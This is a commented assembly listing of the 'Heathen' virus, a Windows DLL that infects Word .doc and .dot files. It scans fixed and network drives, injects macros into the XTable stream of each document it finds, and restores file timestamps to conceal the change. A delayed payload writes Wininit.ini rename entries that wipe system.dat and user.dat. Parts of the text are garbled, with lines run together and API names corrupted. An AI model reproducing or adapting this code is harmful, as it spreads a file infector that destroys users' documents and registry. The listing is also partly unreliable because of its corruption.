Push 11h; STGM_WRITE STGM_SHARE_EXCLUSIVE
Push 0; Zero (Reserved)
Push Offset Xtable; Name of Stream: "0Table" or "1TABLE"
MOV ECX, [EBP ISTORAGE1]
Push ECX
Mov Eax, [ECX]
Call [Eax iStorage_Interface.OpenStream]; Open Stream
Test Eax, EAX
JNZ Error73
Push 1; STGMOVE_COPY (WAwant a copy!)
Push Offset Amacros; Name of Element in Destination
Push [EBP ISTORAGE1]; DESTINATION ISTORAGE Object (The document to be infected!)
Push Offset Amacros; Name of Element To Be Moved
Mov Edx, DS: iStorage; Source IStorage (Heathen.VDO)
Push Edx
MOV ECX, [EDX]
Call [ECX ISTORAGE_INTERFACE.MOVEELEMENTTO]; COPY Macros!
Test Eax, EAX
JNZ Error74; EXIT ON Error
MOV DWORD PTR [EBP Seekoffset], 0
MOV DWORD PTR [EBP Seekoffset 4], 0
Lea Eax, [EBP Macrosoffset]; Here Will Be Returned End of Xtable, Where Virus Will Copy ITS Macros
Push EAX
Push 2; stream_seek_end
Push DWORD PTR [EBP Seekoffset 4]
Push DWORD PTR [EBP Seekoffset]
MOV ECX, [EBP ISTREAM2]
Push ECX
Mov Eax, [ECX]
Call [eax istream_interface.seek]; seek to end of stream xtable
PUSH 0
PUSH 0
Push DWORD PTR DS: HeathenMacrossize 4
Push DWORD PTR DS: Heathenmacrossize; Size of Virus Macros (That Were Stored in WordDocument Stream of Heathen.vdo)
Push [EBP ISTREAM2]; Destination Stream (Xtable Stream of Document To BE Infected!)
Mov ECX, DS: ISTREAM; Source Stream (WordDocument of Heathen.vdo, WHERE Virus Macros Are Stored !!!))
Push ECX
Mov Eax, [ECX]
Call [eax istream_interface.copyto]; COPY VIRUS Macros At End of XTable
Test Eax, Eaxjnz Short Error75
MOV EDX, [EBP Macrosoffset]; Edx = Offset of Macros in XTable
Mov ECX, DWORD PTR DS: HeathenMacrossize; ECX = Size of Macros
MOV DWORD PTR [EBP Buffer 15ah], EDX; fccmds = offset in XTable stream of macros
MOV DWORD PTR [EBP Buffer 15eh], ECX; LCBCMDS = SIZE OF MACROS
Push 0; NULL (DONT RETURN NEW POSITION)
Push 0; stream_seek_set
Push DWORD PTR [EBP Seekoffset 4]; NULL
Push DWORD PTR [EBP Seekoffset]; NULL
MOV EDX, [EBP ISTREAM1]
Push Edx
MOV ECX, [EDX]
Call [ECX ISTREAM_INTERFACE.SEEK]; Set Street Pointer to Beginning Of WordDocument
PUSH 0
Lea Eax, [EBP BUFFER]
Push 200h; Size of Header
Push EAX
MOV EDX, [EBP ISTREAM1]
Push Edx
MOV ECX, [EDX]
Call [ECX ISTREAM_INTERFACE.WRITE]; WRITE WordDocument Header
MOV ESI, 1
Error75:
Push 0; NULL (DONT RETURN NEW POSITION)
Push 0; stream_seek_set
Push DWORD PTR [EBP Seekoffset 4]
Push DWORD PTR [EBP Seekoffset]
Mov EDX, DS: istream
Push Edx
MOV ECX, [EDX]
Call [ECX ISTREAM_INTERFACE.SEEK]; Set Street Pointer to Begging of WordDocument Stream in Heathen.VDO
Error74:
MOV EAX, [EBP ISTREAM2]
Push EAX
Mov Edx, [EAX]
Call [EDX ISTREAM_INTERFACE.RELEASE]; Close Street XTable
Error73:
MOV ECX, [EBP ISTREAM1]
Push ECX
Mov Eax, [ECX]
Call [eax istream_interface.release]; Close Stream WordDocument (of infread document)
Error72:
Mov Edx, [EBP ISTORAGE1]
Push Edx
MOV ECX, [EDX]
Call [ECX ISTORAGE_INTERFACE.RELEASE]; Close ISTORAGE Object (Infected Document)
Test ESI, ESI
JZ Short Error71; EXIT IF INFECTION WAS NOT SUCCESSFUL
Push 0; null
Push 0; null
Push 3; Create_ALWAYS
Push 0; null = file cannot be inheritedpush 0; 0 = prevent file from being shared
Push 40000000H; Generic_Write
Push EBX
Call API_CREATEFILEA; Open Document File
MOV EBX, EAX
Lea Eax, [EBP STATG.MTIME]
Push EAX
Lea Edx, [EBP STATG.ATIM]
Push Edx
Lea ECX, [EBP STATG.CTIME]
Push ECX
Push EBX
Call API_SETFILETIME; Restore Filetime
Push EBX
Call API_CloseHandle; Close File Handle
Error71:
MOV EAX, ESI
Error70:
POP ESI
POP EBX
MOV ESP, EBP
POP EBP
Retn
InfectDocument Endp
; --------------- Subroutine --------------------------------- --------
SearchDirectories Proc Near
Rootpathname = byte PTR-724H
Documentname = byte PTR -71CH
DirectoryName = BYTE PTR-5F0H
File_Search_pattern = byte PTR-4C4H
Win32_find_data = win32_find_data_struc ptr-398h
SubdirectoryName = byte PTR-258H
FILENAME = BYTE PTR-12CH
Push EBX
PUSH ESI
Add ESP, 0FFFFF8DCH
CMP DS: DirectoryList.NextDirectoryStruc, 0; End Of Director?
Lea ESI, [ESP 724H WIN32_FIND_DATA]; ESI = WIN32_FIND_DATA
JZ Short Directories_END; YES, NO More Directories
Lea Eax, [ESP 724H DocumentName]
Push EAX
Push Offset DirectoryList.NextDirectoryStruc; Next Directory
Call deletedIRectoryFromList; get next explump in infect and free it from list
Add ESP, 8
Lea Edx, [ESP 724H DocumentName]
Push Edx
Call InfectDocument; Infect Document (Unless ITS A Directory Name)
POP ECX
MOV Eax, 1
JMP Error80
; ------------------------------------------------- ----------------------------
Directories_end:
CMP DS: DirectoryList.directoryName, 0; Finished All Directories of current Drive In schera List?
Jnz short search_documents; not yet
Call API_GETLOGICALDRIVES; GET INFO ON LOGICAL DRIVES (BITS in Eax Set To One) Invalid_Drive:
INC DS: Drive; Next Drive
CMP DS: DRIVE, 1AH; 'Z'?
Jle Short Checkdrive
XOR EDX, EDX
Mov DS: Drive, EDX; Scan Again All Drives!
CheckDrive:
CMP DS: Drive, 2; (2 = C :)
Jl Short Invalid_Drive; Drives A: and B: Will Not Be infected!
MOV ECX, DS: Drive
Mov EDX, 1
SHL EDX, CL
Test EDX, EAX
JZ Short Invalid_Drive; Drive Not Present!
Push Offset Aroot
Lea Eax, [ESP 728H Rootpathname]
Push EAX
Call API_LSTRCPYA; "A:"
Mov Cl, Byte PTR DS: Drive
Add [ESP 724H Rootpathname], Cl; SET Drive Letter
Push ESP; & rootpathname
Call API_GetDriveTypea; Get Info On Logical Drive
Test Eax, Eax; Drive_Unknown
JZ Short Add_Drive_path
CMP EAX, 3; Drive_Fixed
JZ Short Add_Drive_path
CMP EAX, 4; Drive_Remote
Jnz short continue_later; exit with error free (will Continue Later!)
Add_Drive_path:
Push ESP; & rootpathname
Push Offset DirectoryList
Call AdddiRectoryTolist; add root directory to list
Add ESP, 8
JMP Error80
; ------------------------------------------------- ----------------------------
Continue_later:
Mov Eax, 1; EAX! = 0 -> NO ErrorS
JMP Error80
; ------------------------------------------------- ----------------------------
Search_Documents:
Lea Edx, [ESP 724H DirectoryName]
Push Edx
Push Offset DirectoryList
Call deletedirectoryFromList; Get A Directory from list to search files (and free it from list)
Add ESP, 8
Lea ECX, [ESP 724H DirectoryName]; Path To Search Files
Push ECX
Push Offset ASearchPattern
Lea Eax, [ESP 72CH File_Search_pattern]
Push EAX
Call API_WSPrintfa; "Drive: Directory *. *"
Add ESP, 0CH
Push ESI; ESI = WIN32_FIND_DATA
Lea EDX, [ESP 728H File_Search_pattern]
Push Edx
Call API_FindFirstFilea; Find Files!
MOV EBX, EAX
CMP EBX, 0FFFFFFFH
JZ Error81; Error
Check_file:
TEST BYTE PTR [ESI WIN32_FIND_DATA_STRUC.DWFILEATTRIBUTES], 10H; FILE_ATTRIBUTE_DIRECTORY?
JZ Short file_found
PUSH OFFSET A__
Lea Eax, [ESI WIN32_FIND_DATA_STRUC.CFILENAME]
Push EAX
Call API_LSTRCMPA
Test Eax, EAX
JZ Short file_found; jump if ".."
Push Offset A_
Lea Edx, [ESI WIN32_FIND_DATA_STRUC.CFILENAME]
Push Edx
Call API_LSTRCMPA
Test Eax, EAX
JZ Short file_found; jump if "."
Lea ECX, [ESI WIN32_FIND_DATA_STRUC.CFILENAME]
Push ECX; Name of Found Subdirectory
Lea EAX, [ESP 728H DirectoryName]
Push EAX
Push Offset ASS1; "% s% s"
Lea Edx, [ESP 730H SubdirectoryName]
Push Edx
Call api_wsprintfa; "Drive: DirectorySubdirectory"
Add ESP, 10h
Lea ECX, [ESP 724H SubdirectoryName]
Push ECX
Push Offset DirectoryList
Call AdddiRectorytolist; add it to list
Add ESP, 8
Test Eax, EAX
Jnz short search_more_files; Search More Files
XOR EAX, EAX; Error
JMP Error80
; ------------------------------------------------- ----------------------------
JMP Short Search_More_Files
; ------------------------------------------------- ----------------------------
File_found:
Lea Edx, [ESI WIN32_FIND_DATA_STRUC.CFILENAME]
Push Edx
Call Uppercase; Convert All Letters to Uppercase
POP ECX
XOR EAX, Eax; Eax = Index in FileName
JMP Short Check_File2
; ------------------------------------------------- ----------------------------
Search_end_of_filename:
INC EAX
Check_file2:
CMP [ESI ESI WIN32_FIND_DATA_STRUC.CFILENAME], 0JNZ Short search_end_of_filename; Get to End of FileName
Lea EDX, [ESI WIN32_FIND_DATA_STRUC.DWRESERVED1]
Add Eax, EDX; EAX = Pointer to 4 Bytes Before End of FileName
Mov Edx, [EAX]
CMP EDX, 434F442EH; ".doc"
JZ Short Target_extensions
CMP EDX, 544F442EH; ".dot"
Jnz Short Search_More_Files
TARGET_EXTENSIONS:
Lea Eax, [ESI WIN32_FIND_DATA_STRUC.CFILENAME]
Push EAX
Lea ECX, [ESP 728H DirectoryName]
Push ECX
Push Offset ASS2
Lea Eax, [ESP 730H FileName]
Push EAX
Call API_WSPrintfa; "Drive: DirectoryDocument"
Add ESP, 10h
Lea Edx, [ESP 724H FileName]
Push Edx
Push Offset DirectoryList.NextDirectoryStruc
Call adddirectorytolist; add document to list
Add ESP, 8
Test Eax, EAX
Jnz Short Search_More_Files
XOR EAX, EAX; Error
JMP Short Error80
; ------------------------------------------------- ----------------------------
Search_more_files:
PUSH ESI
Push EBX
Call API_FindNextFilea; Search More Files / Subdirectories
Test Eax, EAX
JNZ Check_File; Check this file
Push EBX
Call API_FindClose; Close Search Handle
Error81:
MOV EAX, 1; Means Error Free :-)
Error80:
Add ESP, 724H; (EAX = 0 -> Some Error Occured)
POP ESI
POP EBX
Retn
SearchDirectories Endp
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frame
Thread2_entrypoint Proc Near
Push EBP
MOV EBP, ESP
Continue_Search:
Call searchDirectories
Test Eax, EAX
JZ Short Error30; EAX = 0 means That Some Error Occured
Push 3E8H; Timeout Interval = 1000 MiliseConds = 1 SECOND
Push DS: EventHandle
Call api_waitforsingleObject; Wait for the Event to Be SignaledCmp Eax, 102H; Wait_Timeout?
JZ Short Continue_Search; In Case of Timeout, Repeat Process. Else Finish Thread.
Error30:
XOR EAX, EAX
POP EBP
RETN 4; EXIT THREAD
THREAD2_ENTRYPOINT ENDP
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frame
WndProc Proc Near
HWND = DWORD PTR 8
UINT = DWORD PTR 0CH
WPARAM = DWORD PTR 10H
LPARAM = DWORD PTR 14H
Push EBP
MOV EBP, ESP
MOV EDX, [EBP WPARAM]; WPARAM
MOV EAX, [EBP UINT]; Message Identifier
MOV ECX, EAX
SUB ECX, 16H; WM_ENDSESSION INFORMS The Application WHether The Windows Session IS Ending
Jnz Short CallDefaultWndProc; Go To Default WndProc, Unless WM_ENDSESSION IS Received
Test EDX, EDX
JZ Short MessageProcessed; wparam = false = session is not being end
Push DS: EventHandle
Call API_SETEVENT; SET State of Event Object As Signaled, SO API WaitsingleObject Returns!
Push 0FFFFFFFH
Push ds: thread2_handle
Call api_waitforsingleObject; Wait To Signaled State of the Thread2, That IS, WHEN Thread Finishes
Call Updatescandata; Write to Disk The List of Currently Scanned Directories
Mov Eax, DS: ISTREAM
Push EAX
Mov Edx, [EAX]
Call [edx istream_interface.release]; Close Stream WordDocument (OnIlockBytes)
Mov Eax, DS: iStorage
Push EAX
Mov Edx, [EAX]
Call [EDX ISTORAGE_INTERFACE.RELEASE]; Close IStorage (onilockbytes)
MOV ECX, DS: IlockBytes
Push ECX
Mov Eax, [ECX]
Call [eax ilockbytes_interface.release]; Release iLockBytes Interface
CMP DS: MoreThanhalfyear, 0
JZ Short MessageProcessed; Skip if Less Than 183 Days Since Virus Installation
Call Payload; Lets Play with Wininit.ini: -djmp Short MessageProcessed
; ------------------------------------------------- ----------------------------
CallDefaultWndProc:
Push [ebp lparam]; lparam
Push Edx; WPARAM
Push Eax; uint
Push [EBP HWND]; HWND
Call api_defwindowproca; call default wndproc
JMP short exit_wndproc
; ------------------------------------------------- ----------------------------
MessageProcessed:
XOR Eax, Eax; Indicate That The Message Has Been Proced
EXIT_WNDPROC:
POP EBP
Retn 10h
WNDPROC ENDP
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frame
Thread1_entrypoint Proc Near
Message = DWORD PTR-48H
WNDCLASS = WNDCLASS_STRUC PTR-2CH
Thread2_id = DWORD PTR-4
DllHandle = DWORD PTR 8
Push EBP
MOV EBP, ESP
Add ESP, 0FFFFFB8H
Push EBX
Call initvariables; init some variables and check date (for payload)
Test Eax, EAX
JZ EXIT_THREAD1; EXIT ON Error
Push Offset MemoryAllocator
Push 1; MUST BE 1
Call API_COGETMALLOC; GET IMALLOC INTERFACE
Call InitDirectoryList; Initialize Directory List
XOR EAX, EAX
XOR EDX, EDX
MOV [EBP WNDCLASS.STYLE], EAX
XOR ECX, ECX
MOV [EBP WNDCLASS.LPFNWNDPROC], OFFSET WNDPROC
MOV [EBP WNDCLASS.CBCLSEXTRA], EDX
MOV [EBP WNDCLASS.CBWNDEXTRA], ECX
Mov Eax, [EBP DLLHANDLE]; argument given to the thread
MOV [EBP WNDCLASS.HINSTANCE], EAX
Push 7F00H; IDI_Application (Default Application Icon)
Push 0; null
Call API_Loadicona; Return Handle to the Application Icon
MOV [EBP WNDCLASS.HICON], EAX
Push 7F00H; IDC_ARROW
PUSH 0
Call api_loadcursora; return handle to the application cursor
MOV [EBP WNDCLASS.HCURSOR], EAX
Push 4; Black_brushcall API_GETSTOCKOBJECT; Retrieves a Handle To One of the Predefined Stock Pens
MOV [EBP WNDCLASS.HBRBACKGROUND], EAX
XOR EDX, EDX
MOV [EBP WNDCLASS.LPSZMENUNUNAME], EDX; NULL = Windows Belonging to this class have no default menu
Lea ECX, [EBP WNDCLASS]; Address Of Structure with Class Data
MOV [EBP WNDCLASS.LPSZCLASSNAME], OFFSET AHEATHENWC; LPSZCLASSNAME
Push ECX
Call API_REGISTERCLASSA; Registers A Window Class for Subsequent Calls to CreateWindow / CreateWindowex
Test Ax, AX
JZ EXIT_THREAD1; Error
Push 0; lpparam = NULL
Push [EBP DLLHANDLE]; Application Instance
Push 0; null
Push 0; null
Push 64h; Height
Push 64h; width
PUSH 80000000H; CW_USEDEFAULT
PUSH 80000000H; CW_USEDEFAULT
PUSH 80000000H; CW_USEDEFAULT
PUSH 0
Push Offset Aheathenwc; Pointer To Registered Class Name
PUSH 0
Call api_createWindowexa; Create Window
Test Eax, EAX
JZ Short Exit_thread1; Error
Lea Eax, [EBP THREAD2_ID]; & thREAD2_ID
Push EAX
Push 4; Create_Suspended
Push 0; argument for new thread
Push Offset Thread2_ENTRYPOINT; LPTHREAD_START_ROUTINE
Push 10000h; Stack Size
Push 0; null = thread Attributes
Call api_createthread; crete thread2
MOV EBX, EAX
Mov DS: Thread2_Handle, EBX; Save Thread2 Handle
Test EBX, EBX
JZ Short Exit_thread1; Error
Push Offset Aheathenishere; Event Object Name
Push 0; Initial State = Nonsignaled
Push 1; it Requires to manually reset the state to nonsignaled
Push 0; null = handle cannot be inherited
Call api_createeventa; Create An Event Object
Mov DS: EventHandle, EAX; Save Event Handle
Push 0FFFFFFF1H; Thread_Base_Idle
Push ds: thread2_handle
Call API_SETTHREADPRIORITY; SET Thread2 prioritypush ds: thread2_handle
Call API_RESUMETHREAD; Resume Thread! :-)
JMP short getMessage
; ------------------------------------------------- ----------------------------
DispatchMessage:
Lea Eax, [EBP Message]
Push EAX
Call api_dispatchMessagea; Dispatch Message
GetMessage:
Push 0; wmsgfiltermax = null (no range filtering ispeformed)
Push 0; WMSGFILTERMIN = NULL (No Range Filtering is Performed)
Push 0; null = Retrieves Messages for Any Window That Belongs to the Calling Thread
Lea Edx, [EBP Message]
Push Edx
Call API_GetMessagea; Retrieves a Message from the calling thread's message queue and places it in the specified structure
Test Eax, EAX
Jnz Short DispatchMessage; Do It Again Until The Function Retrieves The WM_QUIT Message
EXIT_THREAD1:
XOR EAX, EAX
POP EBX
MOV ESP, EBP
POP EBP
Retn 4; End Thread
Thread1_entrypoint endp
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frame
Dllmain Proc Near
Thread1_id = Byte PTR-4
Hinstdll = DWORD PTR 8
FDWREASON = DWORD PTR 0CH
Push EBP
MOV EBP, ESP
Push ECX
Push EBX
CMP [EBP FDWREASON], 1; DLL_PROCESS_ATTACH?
Jnz short exit_dllmain; no
Lea Eax, [EBP Thread1_ID]
Push Eax; & thread1_id
Push 4; Create_Suspended
Push [EBP Hinstdll]; Argument for New Thread (= DLL Module Handle)
Push Offset Thread1_ENTRYPOINT; LPTHREAD_START_ROUTINE
Push 10000h; Size of Stack
Push 0; null = thread Attributes
Call api_createthread; crete thread1
MOV EBX, EAX
Test EBX, EBX
JZ short exit_dllmain; EXIT IN ERROR
Push 0FFFFFFF1H; Thread_Base_Idle
Push Ebx; Thread1 Handle
Call api_setthreadpriority; set thread1 prioritypush ebx; thread1 handle
Call API_RESUMETHREAD; Resume Thread! :-)
EXIT_DLLMAIN:
MOV Eax, 1; True = DLLMAIN SUCCEEDS
POP EBX
POP ECX
POP EBP
Retn 8
DLLMAIN ENDP
; --------------- Subroutine --------------------------------- --------
API_SETTHREADPRIORITY PROC NEAR
JMP DS: SetthreadPriority
API_SETTHREADPRIORITY ENDP
; --------------- Subroutine --------------------------------- --------
API_GETWINDOWSDIRECTORYA Proc Near
JMP DS: GetWindowsDirectorya
API_GETWINDOWSDIRECTORYA ENDP
; --------------- Subroutine --------------------------------- --------
API_FINDNEXTFILEA PROC NEAR
JMP DS: FINDNEXTFILEA
API_FINDNEXTFILEA ENDP
; --------------- Subroutine --------------------------------- --------
API_CREATEEVENTA Proc Near
JMP DS: CREATEEVENTA
API_CREATEEVENTA ENDP
; --------------- Subroutine --------------------------------- --------
API_SETEVENT Proc Near
JMP DS: setEvent
API_SETEVENT ENDP
; --------------- Subroutine --------------------------------- --------
API_FINDCLOSE Proc Near
JMP DS: FindClose
API_FINDCLOSE ENDP
; --------------- Subroutine --------------------------------- --------
API_WAITFORSINGLEOBJECT Proc Near
JMP DS: WaitforsingleObject
API_WAITFORSINGLEOBJECT ENDP
; --------------- Subroutine --------------------------------- --------
API_GETDRIVETYPEA Proc Near
JMP DS: GetDriveTypea
API_GETDRIVETYPEA ENDP
; --------------- Subroutine --------------------------------- --------
API_GETLOGICALDRIVES Proc Near
JMP DS: GetLogicalDrives; Get Bitmask Representing
API_GETLOGICALDRIVES ENDP; The Currently Available Disk Drives
; --------------- Subroutine --------------------------------- ------ API_FileTimetosystemTime Proc Near
JMP DS: FileTimetosystemTime
API_FileTimetosystemTime ENDP
; --------------- Subroutine --------------------------------- --------
API_CREATEFILEA PROC NEAR
JMP DS: CREATEFILEA
API_CREATEFILEA ENDP
; --------------- Subroutine --------------------------------- --------
API_FINDFIRSTFILEA Proc Near
JMP DS: FindfirstFilea
API_FINDFIRSTFILEA ENDP
; --------------- Subroutine --------------------------------- --------
API_SETFILETIME PROC NEAR
JMP DS: SetFileTime
API_SETFILETIME ENDP
; --------------- Subroutine --------------------------------- --------
API_RESUMETHREAD PROC NEAR
JMP DS: ResumeTHRead
API_RESUMETHREAD ENDP
; --------------- Subroutine --------------------------------- --------
API_CREATTHREAD Proc Near
JMP DS: CreateThread
API_CRETHREAD ENDP
; --------------- Subroutine --------------------------------- --------
API_CloseHandle Proc Near
JMP DS: CloseHandle
API_CLOSEHANDLE ENDP
; --------------- Subroutine --------------------------------- --------
API_WRITEFILE PROC NEAR
JMP DS: WRITEFILE
API_WRITEFILE ENDP
; --------------- Subroutine --------------------------------- --------
API_LSTRCATA Proc Near
JMP DS: LSTRCATA
API_LSTRCATA ENDP
; --------------- Subroutine --------------------------------- --------
API_LSTRCMPA Proc Near
JMP DS: LSTRCMPA
API_LSTRCMPA ENDP
; --------------- Subroutine --------------------------------- --------
API_LSTRCPYA PROC NEAR
JMP DS: LSTRCPYA
API_LSTRCPYA ENDP
; --------------- Subroutine --------------------------------- --------
API_LSTRLENA PROC NEAR
JMP DS: lstrlenaapi_lstrlena ENDP
; --------------- Subroutine --------------------------------- --------
API_GETSYSTEMTIME PROC NEAR
JMP DS: GetSystemTime
API_GETSYSTEMTIME ENDP
; --------------- Subroutine --------------------------------- --------
API_REGISTERCLASSA Proc Near
JMP DS: RegisterClassa
API_REGISTERCLASSA ENDP
; --------------- Subroutine --------------------------------- --------
API_LOADICONA Proc Near
JMP DS: Loadicona
API_LOADICONA ENDP
; --------------- Subroutine --------------------------------- --------
API_LOADCURSORA PROC NEAR
JMP DS: LoadCursora
API_LOADCURSORA ENDP
; --------------- Subroutine --------------------------------- --------
API_GETMESSAGEA Proc Near
JMP DS: GetMessagea
API_GETMESSAGEA ENDP
; --------------- Subroutine --------------------------------- --------
API_DISPATCHMESSAGEA Proc Near
JMP DS: DispatchMessagea
API_DISPATCHMESSAGEA ENDP
; --------------- Subroutine --------------------------------- --------
API_DEFWINDOWPROCA Proc Near
JMP DS: DEFWINDOWPROCA
API_DEFWINDOWPROCA ENDP
; --------------- Subroutine --------------------------------- --------
API_CREATEWINDOWEXA PROC NEAR
JMP DS: CREATEWINDOWEXA
API_CREATEWINDOWEXA ENDP
; --------------- Subroutine --------------------------------- --------
API_WSPRINTFA PROC NEAR
JMP DS: WSPrintfa
API_WSPRINTFA ENDP
; --------------- Subroutine --------------------------------- --------
API_STGOPENSTORAGE PROC NEAR
JMP DS: STGOpenStorage
API_STGOPENSTORAGE ENDP
; --------------- Subroutine --------------------------------- --------
API_STGCREATEDOCFILEONILOCKBYTES PROC NEAR
JMP DS: STGCREATEDOCFILOCKBYTES
API_STGCREATEDOCFILEONILOCKBYTES ENDP; --------------- Subroutine ------------------------------- ------------
API_CREATEILOCKBYTESONHGLOBAL PROC NEAR
JMP DS: CreateIlockBytesonhglobal
API_CREATEILOCKBYTESONHGLOBAL ENDP
; --------------- Subroutine --------------------------------- --------
API_COGETMALLOC PROC NEAR
JMP DS: Cogether Malloc
API_COGETMALLOC ENDP
; --------------- Subroutine --------------------------------- --------
API_GETSTOCKOBJECT Proc Near
JMP DS: GetStockObject
API_GETSTOCKOBJECT ENDP
; ------------------------------------------------- ----------------------------
Align 100h
DB 0A00H DUP (?)
Code ends
; Section 2. (Virtual Address 00003000)
Virtual size: 00001000 (4096.)
Step size in file: 00000400 (1024.)
Offset to Raw Data for Section: 00001C00
Flags C0000040: Data Readable Writable
ALIGNMENT: 16 BYTES?
; ------------------------------------------------- ----------------------------
; Segment Type: Pure Data
Data segment para public 'data' use32
Assume CS: Data
org 403000h
AgetWindowsDirectorya DB 'getWindowsDirectorya', 0
AcopyFilea DB 'Copyfilea', 0
Deletefilea DB 'deletefilea', 0
AcreateFilea DB 'Createfilea', 0
Areadfile db 'readfile', 0
AWRITEFILE DB 'WRITEFILE', 0
AcloseHandle DB 'CloseHandle', 0
ASETFILEPOINTER DB 'SETFILEPOINTER', 0
AGETFILETIME DB 'GETFILETIME', 0
ASETFILETIME DB 'SETFILETIME', 0
AlStrcata DB 'LSTRCATA', 0
Alstrcpya DB 'Lstrcpya', 0
AlStrCMPA DB 'LSTRCMPA', 0
Alstrlena DB 'lstrlena', 0
AstgopenStorage DB 'STGOPENSTORAGE', 0
ASTGCREATEDOCFILE DB 'STGCREATEDOCFILE', 0
ACOGETMALLOC DB 'Cogether Malloc', 0AloadLibrarya DB 'loadinglibrarya', 0
Akernel32_dll db 'kernel32.dll', 0
AHTMP_DOC DB 'HTMP.DOC', 0
Aexplorer_exe DB 'Explorer.exe', 0
AHEATHEN_VEX DB 'Heathen.Vex', 0
AHEATHEN_VDL DB 'Heathen.vdl', 0
AHEATHEN_VDO DB 'Heathen.vdo', 0
AWININIT_INI DB 'Wininit.ini', 0
Arename DB '[Rename], 0DH, 0AH, 0
AWORDDocument:
Unicode 0,
XTable:
Unicode 0,
Amacros:
Unicode 0,
Ascandata:
Unicode 0,
AHEATINWC DB 'Heathenwc', 0
AHEATHENISHERE DB 'Heathen Is Here', 0
Arename2 db '% snul =% ssystem.dat', 0DH, 0AH
DB 'NUL =% SUSER.DAT', 0DH, 0AH
DB 'NUL =% SSYSTEM.DA0', 0DH, 0AH
DB 'NUL =% SUSER.DA0', 0
Aroot DB 'A:', 0
ASEARCHPATTERN DB '% S *. *', 0
A__ db '..', 0
A_ db '.', 0
ASS1 DB '% S% S', 0
ASS2 DB '% S% S', 0
DB 0;
MemoryAllocator DD 0
DirectoryList DD 0; DIRECTORYNAME
DD 0; NextDIRECTORYSTRUC
WindowsDirectory DB 12ch dup (0)
IlockBytes DD 0
IStorage DD 0
IStorage Del Heathen.vdo
ISTREAM DD 0
HeathenMacrossize DQ 0
Unicode_heathenvdo DB 258H DUP (0)
Drive dd?
MoreThanhalfyear DD?
May14h dd?
EVENTHANDLE DD?
THREAD2_HANDLE DD?
Align 1000h
Data ends
;
Imports from kenel32.dll
;
; Section 3. (Virtual Address 00004000)
Virtual size: 00001000 (4096.)
; Section size in file: 00000600 (1536.)
OFFSET TO RAW DATA for Section: 00002000
Flags C0000040: Data Readable Writable
ALIGNMENT: 16 BYTES?
; ------------------------------------------------- ----------------------------
Segment Type: Externs
_IDATA
Extrn SetthreadPriority: DWordextrn getWindowsDirectorya: DWORD
EXTRN FINDNEXTFILEA: DWORD
EXTRN CREATEEVENTA: DWORD
EXTRN STEVENT: DWORD
EXTRN FINDCLOSE: DWORD
EXTRN WAITFORSINGLEOBJECT: DWORD
EXTRN GETDRIVETYPEA: DWORD
EXTRN GETLOGICALDRIVES: DWORD
Get Bitmask representing
; The Currently Available Disk Drives
EXTRN FILETITOSystemTime: DWORD
EXTRN CREATEFILEA: DWORD
EXTRN FINDFIRSTFILEA: DWORD
EXTRN SETFILETIME: DWORD
Extrn ResumeTHREAD: DWORD
EXTRN CREATTHREAD: DWORD
EXTRN CloseHandle: DWORD
EXTRN WRITEFILE: DWORD
EXTRN LSTRCATA: DWORD
EXTRN LSTRCMPA: DWORD
EXTRN LSTRCPYA: DWORD
EXTRN LSTRLENA: DWORD
EXTRN GETSYSTEMTIME: DWORD
;
Imports from user32.dll
;
EXTRN RegisterClassa: DWORD
EXTRN LOADICONA: DWORD
EXTRN LOADCURSORA: DWORD
EXTRN GetMessagea: DWORD
EXTRN DISPATCHMESSAGEA: DWORD
EXTRN DEFWINDOWPROCA: DWORD
EXTRN CREATEWINDOWEXA: DWORD
EXTRN WSPRINTFA: DWORD
;
Imports from ole32.dll
;
EXTRN STGOPENSTORAGE: DWORD
EXTRN STGCREATEDOCFILEONILOCKBYTES: DWORD
EXTRN CREATEILOCKBYTESONHGLOBAL: DWORD
EXTRN COGETMALLOC: DWORD
;
Imports from GDI32.DLL
;
EXTRN GETSTOCKOBJECT: DWORD
END DLL_ENTRYPOINT
